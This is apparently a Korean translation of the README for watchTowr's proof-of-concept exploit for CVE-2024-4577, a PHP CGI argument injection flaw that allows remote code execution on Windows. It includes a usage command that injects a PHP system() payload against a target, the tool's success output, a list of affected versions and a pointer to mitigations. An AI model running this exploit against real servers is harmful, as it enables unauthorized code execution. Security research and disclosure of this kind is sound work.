
PHP CGI 인자 주입 (CVE-2024-4577) 원격 코드 실행 PoC
@watchTowr가 개발한 PoC(Proof of Concept)로, PHP CGI 인자 주입(Argument Injection) 취약점(CVE-2024-4577)을 악용하여 Windows 환경에서 실행되는 취약한 PHP 버전에서 RCE(원격 코드 실행)를 획득합니다. 이 취약점에 대한 상세 기술 분석
이 취약점은 DEVCORE (@d3vc0r3)의 Orange Tsai (@orange_8361)가 발견했습니다. 그의 뛰어난 연구를 꼭 팔로우하세요. 우리의 역할은 이 문제에 대한 익스플로잇을 재현하고 개발하는 것뿐이었습니다.
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
원본 DEVCORE (@d3vc0r3)의 블로그 게시물에 따르면, 이 취약점은 Windows 운영 체제에 설치된 모든 PHP 버전에 영향을 미칩니다:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
PHP 8.0, PHP 7 및 PHP 5 브랜치는 수명 종료(End-of-Life)되어 더 이상 유지 관리되지 않으므로, 서버 관리자는 여기의 'Am I Vulnerable' 섹션을 참조하여 완화 조치(Mitigation Measure) 섹션에서 임시 패치 권장 사항을 확인할 수 있습니다.
watchTowr (@watchtowrcyber)의 Aliz (@AlizTheHax0r) 및 Sina Kheirkhah (@SinSinology)
최신 보안 연구를 보려면 watchTowr Labs 팀을 팔로우하세요.